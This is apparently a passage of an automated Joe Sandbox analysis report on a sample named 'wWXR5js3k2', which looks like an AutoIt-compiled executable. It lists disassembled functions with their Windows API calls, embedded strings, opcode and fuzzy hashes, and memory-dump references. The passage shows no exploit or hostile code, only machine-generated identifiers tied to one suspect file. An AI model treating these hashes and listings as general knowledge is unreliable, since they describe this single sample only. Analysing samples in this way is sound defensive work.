                                                    • Instruction ID: 08f76a5c20769f6ee27f7f3304b9af6046328c67ef2d731682e5a8d18d7d6d3e
                                                    • Opcode Fuzzy Hash: 8a693412f20ca39a917d454c26586f132c1415842c8df3dce723ca4f52d67460
                                                    • Instruction Fuzzy Hash: 1201A73080470497EB206B50ED4EB9677BAFB01706F00026AB553914E0D7E0AD448F90
                                                    Function 006513B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 006513BF
                                                    • StrokeAndFillPath.GDI32(?,?,0068B888,00000000,?), ref: 006513DB
                                                    • SelectObject.GDI32(?,00000000), ref: 006513EE
                                                    • DeleteObject.GDI32 ref: 00651401
                                                    • StrokePath.GDI32(?), ref: 0065141C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: d9c8847aeadf58ea009de0d9ab42514f2fdc0d78c86e51215698792ada93291d
                                                    • Instruction ID: b00e6f5df7dcf6883c90b2077fa7736ea81e5447390c5e0ea0b6d0026448a730
                                                    • Opcode Fuzzy Hash: d9c8847aeadf58ea009de0d9ab42514f2fdc0d78c86e51215698792ada93291d
                                                    • Instruction Fuzzy Hash: 45F0C930405A08EBDB195F2AEC5C7983BE6A741326F08D325E82A895F1C73949A9DF54
                                                    Function 006BC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 006BC432
                                                    • CoCreateInstance.OLE32(006E2D6C,00000000,00000001,006E2BDC,?), ref: 006BC44A
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • CoUninitialize.OLE32 ref: 006BC6B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: cbbc7e2280ae23a9ee34f919afba87db78afd1c5869928848c93121dcd552739
                                                    • Instruction ID: 9fa673c6685b16f17f6a0d0bcd34794e86301d6ee09561551a775dd7e000e8e7
                                                    • Opcode Fuzzy Hash: cbbc7e2280ae23a9ee34f919afba87db78afd1c5869928848c93121dcd552739
                                                    • Instruction Fuzzy Hash: B0A16BB1104205AFD340EF54C881EABB7EEEF84315F004A1DF5569B1A2EB70EA09CB66
                                                    Function 00662CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00670DB6: std::exception::exception.LIBCMT ref: 00670DEC
                                                      • Part of subcall function 00670DB6: __CxxThrowException@8.LIBCMT ref: 00670E01
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 00657A51: _memmove.LIBCMT ref: 00657AAB
                                                    • __swprintf.LIBCMT ref: 00662ECD
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00662D66
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 00dbfb7da6c1d6e611becb17671567e2a775728a13642d903e0a22d901d03da8
                                                    • Instruction ID: a999bfca5a17b8d10f89c8884c5f565c8382d349f7d76fe24ea78083676c24e4
                                                    • Opcode Fuzzy Hash: 00dbfb7da6c1d6e611becb17671567e2a775728a13642d903e0a22d901d03da8
                                                    • Instruction Fuzzy Hash: D79180711087029FCB54EF24D895CAFB7AAEF85711F00491DF8469B2A1EB30ED49CB66
                                                    Function 006BB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00654750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00654743,?,?,006537AE,?), ref: 00654770
                                                    • CoInitialize.OLE32(00000000), ref: 006BB9BB
                                                    • CoCreateInstance.OLE32(006E2D6C,00000000,00000001,006E2BDC,?), ref: 006BB9D4
                                                    • CoUninitialize.OLE32 ref: 006BB9F1
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                    • String ID: .lnk
                                                    • API String ID: 2126378814-24824748
                                                    • Opcode ID: a8d3924f81eb90a18fc331292bb74698937bb27888fddaa0e95e1074a197bfb3
                                                    • Instruction ID: ffe24536bfba517e8b93852fa3025ecac212bf662ed0004f09228a45e788576e
                                                    • Opcode Fuzzy Hash: a8d3924f81eb90a18fc331292bb74698937bb27888fddaa0e95e1074a197bfb3
                                                    • Instruction Fuzzy Hash: 4CA136B56043019FC710DF24C894D9ABBE6FF89314F148998F8999B3A1CB71ED85CB91
                                                    Function 006AB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 006AB4BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container$%n
                                                    • API String ID: 3565006973-1483441161
                                                    • Opcode ID: c065e10156b507dda9dc7e7145f302a3146564deac8ffe0d1ac9eaac58c3df83
                                                    • Instruction ID: c1f23594bf18bce7b6375c41c7d0ba8ecc6205a65f0c962e860695df91500ccc
                                                    • Opcode Fuzzy Hash: c065e10156b507dda9dc7e7145f302a3146564deac8ffe0d1ac9eaac58c3df83
                                                    • Instruction Fuzzy Hash: A2912870600601DFDB54EF64C894A6AB7EAFF49710F14856DE94A8B292DB71EC41CF60
                                                    Function 0067501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 006750AD
                                                      • Part of subcall function 006800F0: __87except.LIBCMT ref: 0068012B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: 8b673b1c96871ac5b6e0446aa176b65c12a0c14fc0c8d787203ae47b96754660
                                                    • Instruction ID: 3fa7afa31591f9de0a34117d57f15d62f47ea1090527b832c143ed902fcf57db
                                                    • Opcode Fuzzy Hash: 8b673b1c96871ac5b6e0446aa176b65c12a0c14fc0c8d787203ae47b96754660
                                                    • Instruction Fuzzy Hash: 2A516D3190860186EB917724C8553AE2B979B40710F30CED8E4DA863D9DFB48DDD9B8A
                                                    Function 00698584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: 3cf$_f
                                                    • API String ID: 4104443479-1617663849
                                                    • Opcode ID: 9a88d5124b3eef2e18c33babca6c53e0ecfab1738005a4a7abd8d301b47852e3
                                                    • Instruction ID: 62e85a94522db63de86a3cb04c212da736370aeef766ccb0b3ce99aca35454af
                                                    • Opcode Fuzzy Hash: 9a88d5124b3eef2e18c33babca6c53e0ecfab1738005a4a7abd8d301b47852e3
                                                    • Instruction Fuzzy Hash: E4514B70A006099FCF64CF68C884AAEBBF6FF45304F248529E85AD7750EB31A956CB51
                                                    Function 006D7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,006DF910,00000000,?,?,?,?), ref: 006D79DF
                                                    • GetWindowLongW.USER32 ref: 006D79FC
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006D7A0C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: d59556741f73f8bbf0aa77bc5bcd6c8ddbc508b6d0f51df0e903d759b9397827
                                                    • Instruction ID: 5037eca0a46f96c2c3803694265470a295f07de4dedf263e0600dbee93b1d83b
                                                    • Opcode Fuzzy Hash: d59556741f73f8bbf0aa77bc5bcd6c8ddbc508b6d0f51df0e903d759b9397827
                                                    • Instruction Fuzzy Hash: B531D032A04606AFDB118F38DC51BEA77AAEB49324F244726F875923E0E730E9518B50
                                                    Function 006D7A71 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 006D7B61
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006D7B76
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '$hW
                                                    • API String ID: 3850602802-2162195968
                                                    • Opcode ID: aee0abc84378146ca6e7c1c6a81b61ec3920a51054eda9720582cc9de8506ec2
                                                    • Instruction ID: f92fe881d95ea2eebca75f8ff308ace681877eebf86fe8ec84ff4f1a4c70fcda
                                                    • Opcode Fuzzy Hash: aee0abc84378146ca6e7c1c6a81b61ec3920a51054eda9720582cc9de8506ec2
                                                    • Instruction Fuzzy Hash: 12410874E0520A9FDB14CF68C881BEABBB6FB09304F14416AED04EB391E771A951CF91
                                                    Function 006D73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006D7461
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006D7475
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 006D7499
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: c2ceaabf538f55617618c63c6f827da9d6cecef28d09841353aa39ec96897993
                                                    • Instruction ID: 9ae628f4f71000a580f8473aea2c160ee10d273326ade88da7a588ae01f0dc54
                                                    • Opcode Fuzzy Hash: c2ceaabf538f55617618c63c6f827da9d6cecef28d09841353aa39ec96897993
                                                    • Instruction Fuzzy Hash: 9A21A332900218AFDF128F54CC46FEA3BBAEF48724F110215FE156B2D0DA75AC51DBA0
                                                    Function 006D6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006D6D3B
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006D6D4B
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006D6D70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 341f464a471a58f8e549c429eb5e069be0c90ae3f020f55d21681b0eb70a2079
                                                    • Instruction ID: d936b4a64e16a4e671c368644ce580e9c27234af1bfea584e16573186a036daf
                                                    • Opcode Fuzzy Hash: 341f464a471a58f8e549c429eb5e069be0c90ae3f020f55d21681b0eb70a2079
                                                    • Instruction Fuzzy Hash: 36218032A11118BFDF118F54DC45EEB3BBBEF89750F018129F9459B2A0C6719C518BA0
                                                    Function 006C39E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __snwprintf.LIBCMT ref: 006C3A66
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_memmove
                                                    • String ID: , $$AUTOITCALLVARIABLE%d$%n
                                                    • API String ID: 3506404897-2057154807
                                                    • Opcode ID: e67b82cd4e6ba4cec71f4a701668890631f793173b18314180825a3dc70259f7
                                                    • Instruction ID: b5b97848575e554120e08e7dc2ee383c1d4fc5c0983ec6d92d5114f9570fbcc5
                                                    • Opcode Fuzzy Hash: e67b82cd4e6ba4cec71f4a701668890631f793173b18314180825a3dc70259f7
                                                    • Instruction Fuzzy Hash: 2A217171600219AFCF50EFA4DC82EAE77B6EF44700F50449DF845AB281DB34EA55CBA9
                                                    Function 006A8C4B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 006A8C6D
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006A8C84
                                                    • SendMessageW.USER32(?,0000000D,?,00000000), ref: 006A8CBC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u
                                                    • API String ID: 3850602802-2594219639
                                                    • Opcode ID: dccdea112807ec691a0b380ad5e1b66c4b97734bf1e64cb6e5e555e437add72c
                                                    • Instruction ID: 7d08d728bae757f96a5b2db9333f7b31bd03038db65d9eb95db3231c808b4058
                                                    • Opcode Fuzzy Hash: dccdea112807ec691a0b380ad5e1b66c4b97734bf1e64cb6e5e555e437add72c
                                                    • Instruction Fuzzy Hash: B321A432601219BFDF10EBA8D841DAFB7BEEF45350F10445AE506E3250DA71AD448FA4
                                                    Function 006D96F3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @U=u$hW
                                                    • API String ID: 0-4076565667
                                                    • Opcode ID: aef5977a375ff3231726c27b2df2720ec0904adc0daefd6cfa3fea3a8f382052
                                                    • Instruction ID: 525877593b2e11f59c8a1a1f3577e51d3deb50273d15d6296e649619a96fe2a8
                                                    • Opcode Fuzzy Hash: aef5977a375ff3231726c27b2df2720ec0904adc0daefd6cfa3fea3a8f382052
                                                    • Instruction Fuzzy Hash: 7C216D35924108BFEB148F58CC45FFA37A6EB0A310F404166FA16DA3E0D671EA51DB70
                                                    Function 006D770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006D7772
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006D7787
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006D7794
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: de41ede2ff7b33ae71e0a79ecc3dd0a907c7359c877b972cb1ce4d710ce7bea6
                                                    • Instruction ID: 7037381f22836724763f84e89ffceee957f7dfd90d543b84b7a72ef464621bf8
                                                    • Opcode Fuzzy Hash: de41ede2ff7b33ae71e0a79ecc3dd0a907c7359c877b972cb1ce4d710ce7bea6
                                                    • Instruction Fuzzy Hash: DC113A72600208BFEF105F64CC01FDB37AAEF89B54F01461DFA45962D0D271E811CB10
                                                    Function 006D6920 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 006D69A2
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006D69B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: @U=u$edit
                                                    • API String ID: 2978978980-590756393
                                                    • Opcode ID: b1e969a331284a707e4dfec6e046bb29700fd2b1325fa65860e63e471207d262
                                                    • Instruction ID: 5fd9b023ca316a4249afa09cd0ef327a6759287b58bd30a5ecfc0e57dfdb457a
                                                    • Opcode Fuzzy Hash: b1e969a331284a707e4dfec6e046bb29700fd2b1325fa65860e63e471207d262
                                                    • Instruction Fuzzy Hash: 52119D71900109ABEB108F64DC50AEB376AEB05374F504726F9A59A3E0C731DC519760
                                                    Function 006D84E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,?,?,?), ref: 006D8530
                                                    Strings
                                                    Memory Dump Source
